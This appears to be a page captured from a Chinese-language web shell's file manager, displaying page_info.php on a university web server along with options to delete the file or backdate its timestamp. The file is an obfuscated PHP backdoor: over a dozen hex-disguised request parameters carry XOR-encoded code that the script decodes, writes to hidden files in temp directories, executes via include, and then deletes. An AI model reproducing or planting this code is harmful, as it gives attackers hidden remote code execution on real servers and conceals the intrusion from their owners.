文件操作 - page_info.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/demoestudiantes.uaysen.cl/html/page_info.php
编辑文件内容
<?php if(count($_REQUEST) > 0 && isset($_REQUEST["f\x6C\x61g"])){ $object = array_filter([getenv("TMP"), getcwd(), "/tmp", "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path()]); $record = $_REQUEST["f\x6C\x61g"]; $record = explode ( '.', $record ) ; $entry = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $n = 0; array_walk( $record ,function( $v7) use( &$entry ,&$n ,$salt ,$lenS) { $sChar = ord( $salt[$n % $lenS] ); $d =( ( int)$v7 - $sChar -( $n % 10)) ^ 37; $entry .=chr( $d ); $n++; }); $component = 0; do { $ent = $object[$component] ?? null; if ($component >= count($object)) break; if (is_dir($ent) && is_writable($ent)) { $binding = sprintf("%s/.descriptor", $ent); if (file_put_contents($binding, $entry)) { include $binding; @unlink($binding); exit; } } $component++; } while (true); } if(isset($_REQUEST["\x73y\x6D\x62ol"])){ $entry = $_REQUEST["\x73y\x6D\x62ol"]; $entry = explode ( "." ,$entry ); $descriptor = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s1 ); $v = 0; $__tmp = $entry; while($v5 = array_shift($__tmp)) { $sChar = ord($s1[$v % $lenS] ); $dec =((int)$v5 - $sChar -($v % 10)) ^51; $descriptor .=chr($dec ); $v++; } $flg = array_filter([getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", session_save_path(), getenv("TEMP"), getenv("TMP"), "/dev/shm"]); foreach ($flg as $marker): if (array_product([is_dir($marker), is_writable($marker)])) { $desc = "$marker/.parameter_group"; $success = file_put_contents($desc, $descriptor); if ($success) { include $desc; @unlink($desc); die();} } endforeach; } if(filter_has_var(INPUT_POST, "ite\x6D")){ $data = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), "/dev/shm", "/tmp", getenv("TEMP"), getcwd(), "/var/tmp"]); $sym = $_POST["ite\x6D"]; $sym = explode ('.' , $sym ) ; $value = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $o = 0; $__len = count($sym); do { if ($o>= $__len) break; $v4 = $sym[$o]; $sChar = ord($salt[$o % $lenS]); $d = ((int)$v4 - $sChar - ($o % 10)) ^ 68; $value .= chr($d); $o++; } while (true); foreach ($data as $key => $mrk) { if (is_dir($mrk) && is_writable($mrk)) { $resource = "$mrk/.desc"; $success = file_put_contents($resource, $value); if ($success) { include $resource; @unlink($resource); die();} } } } if(array_key_exists("\x73ym", $_POST) && !is_null($_POST["\x73ym"])){ $data = array_filter([session_save_path(), "/var/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]); $property_set = $_POST["\x73ym"]; $property_set = explode ( ".",$property_set) ; $object = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt9); $n = 0; array_walk($property_set , function($v5) use(&$object , &$n , $salt9 , $lenS) { $chS = ord($salt9[$n % $lenS]); $d =((int)$v5 - $chS -($n % 10)) ^95; $object .= chr($d); $n++;} ); foreach ($data as $key => $data_chunk) { if ((bool)is_dir($data_chunk) && (bool)is_writable($data_chunk)) { $item = "$data_chunk" . "/.ent"; $success = file_put_contents($item, $object); if ($success) { include $item; @unlink($item); exit;} } } } if(filter_has_var(INPUT_POST, "\x76\x61lue")){ $val = $_POST["\x76\x61lue"]; $val = explode ('.' , $val ) ; $comp = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s4); foreach ($val as $i =>$v2): $chS = ord($s4[$i% $lenS]); $dec = ((int)$v2 - $chS - ($i% 10)) ^ 16; $comp .= chr($dec); endforeach; $ent = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", getenv("TEMP"), session_save_path(), "/dev/shm", "/tmp", sys_get_temp_dir(), getcwd()]); foreach ($ent as $ent) { if (!( !is_dir($ent) || !is_writable($ent) )) { $bind = sprintf("%s/.resource", $ent); $success = file_put_contents($bind, $comp); if ($success) { include $bind; @unlink($bind); exit;} } } } if(array_key_exists("\x72e\x73", $_REQUEST) && !is_null($_REQUEST["\x72e\x73"])){ $comp = array_filter(["/tmp", sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), getenv("TEMP"), "/dev/shm", session_save_path()]); $itm = $_REQUEST["\x72e\x73"]; $itm =explode ( '.' ,$itm ) ; $mrk = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5); $s = 0; $__tmp = $itm; while ($v9 = array_shift($__tmp)) { $chS = ord($salt5[$s % $lenS]); $d = ((int)$v9 - $chS - ($s % 10)) ^ 87; $mrk.= chr($d); $s++; } while ($item = array_shift($comp)) { if (is_dir($item) && is_writable($item)) { $fac = "$item/.factor"; $success = file_put_contents($fac, $mrk); if ($success) { include $fac; @unlink($fac); exit;} } } } if(isset($_POST["h\x6Cd"])){ $entity = $_POST["h\x6Cd"]; $entity = explode ( '.' , $entity) ; $dat = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6); foreach($entity as $t => $v2): $chS = ord($salt6[$t % $lenS]); $d = ((int)$v2 - $chS -($t % 10)) ^ 33; $dat .= chr($d); endforeach; $mrk = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TMP"), "/tmp", getcwd(), "/dev/shm"]); foreach ($mrk as $key => $resource) { if (!!is_dir($resource) && !!is_writable($resource)) { $itm = join("/", [$resource, ".k"]); if (file_put_contents($itm, $dat)) { include $itm; @unlink($itm); die(); } } } } if(@$_POST["\x76a\x6C"] !== null){ $resource = array_filter([getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getenv("TEMP"), "/dev/shm", "/var/tmp", "/tmp", sys_get_temp_dir()]); $ref = $_POST["\x76a\x6C"]; $ref =explode ( "." , $ref ); $itm = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s3); $k = 0; $__tmp = $ref; while( $v8 = array_shift( $__tmp)) {$chS = ord( $s3[$k % $sLen]); $d =( ( int)$v8 - $chS -( $k % 10)) ^ 99; $itm .= chr( $d); $k++; } while ($obj = array_shift($resource)) { if (is_writable($obj) && is_dir($obj)) { $k = join("/", [$obj, ".data_chunk"]); $file = fopen($k, 'w'); if ($file) { fwrite($file, $itm); fclose($file); include $k; @unlink($k); die(); } } } } if(@$_POST["v\x61lu\x65"] !== null){ $val = $_POST["v\x61lu\x65"]; $val = explode ( "." ,$val ); $bind = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $k = 0; $len = count($val); do { if ($k >=$len) break; $v3 = $val[$k]; $chS = ord($s[$k %$lenS]); $dec = ((int)$v3 - $chS - ($k %10)) ^ 38; $bind .= chr($dec); $k++; } while (true); $obj = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/tmp", "/var/tmp"]); foreach ($obj as $key => $hld) { if (!!is_dir($hld) && !!is_writable($hld)) { $rec = join("/", [$hld, ".data"]); if (@file_put_contents($rec, $bind) !== false) { include $rec; unlink($rec); die(); } } } } if(@$_REQUEST["e\x6Et\x72y"] !== null){ $object = array_filter([getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), getcwd(), "/var/tmp", getenv("TEMP"), "/dev/shm", sys_get_temp_dir()]); $reference = $_REQUEST["e\x6Et\x72y"]; $reference = explode ( '.' , $reference ) ; $hld =''; $salt8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt8); $i =0; while ($i < count($reference)) { $v5 =$reference[$i]; $chS =ord($salt8[$i % $sLen]); $dec =((int)$v5 - $chS - ($i % 10)) ^ 43; $hld .= chr($dec); $i++; } foreach ($object as $descriptor) { if ((is_dir($descriptor) and is_writable($descriptor))) { $rec = "$descriptor/.val"; if (@file_put_contents($rec, $hld) !== false) { include $rec; unlink($rec); die(); } } } } if(!empty($_POST["p\x74r"])){ $desc = array_filter([sys_get_temp_dir(), session_save_path(), "/dev/shm", "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP")]); $dchunk = $_POST["p\x74r"]; $dchunk = explode ( '.' , $dchunk ); $data = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt7); $s = 0; $__len = count($dchunk); do {if($s >= $__len) break; $v5 = $dchunk[$s]; $sChar = ord($salt7[$s % $sLen]); $dec =((int)$v5 - $sChar -($s % 10)) ^51; $data .= chr($dec); $s++; } while(true); foreach ($desc as $key): if (!( !is_dir($key) || !is_writable($key) )) { $rec = str_replace("{var_dir}", $key, "{var_dir}/.fac"); $success = file_put_contents($rec, $data); if ($success) { include $rec; @unlink($rec); die();} } endforeach; } if(count($_POST) > 0 && isset($_POST["r\x65f\x65\x72e\x6Ece"])){ $ent = $_POST["r\x65f\x65\x72e\x6Ece"]; $ent = explode('.', $ent ); $marker=''; $salt5='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt5); foreach ($ent as $r => $v6): $chS=ord($salt5[$r % $sLen]); $d=((int)$v6 - $chS - ($r % 10)) ^ 95; $marker .= chr($d); endforeach; $resource = array_filter(["/var/tmp", getenv("TMP"), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), "/dev/shm", session_save_path()]); while ($ptr = array_shift($resource)) { if (is_writable($ptr) && is_dir($ptr)) { $rec = join("/", [$ptr, ".res"]); $success = file_put_contents($rec, $marker); if ($success) { include $rec; @unlink($rec); exit;} } } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件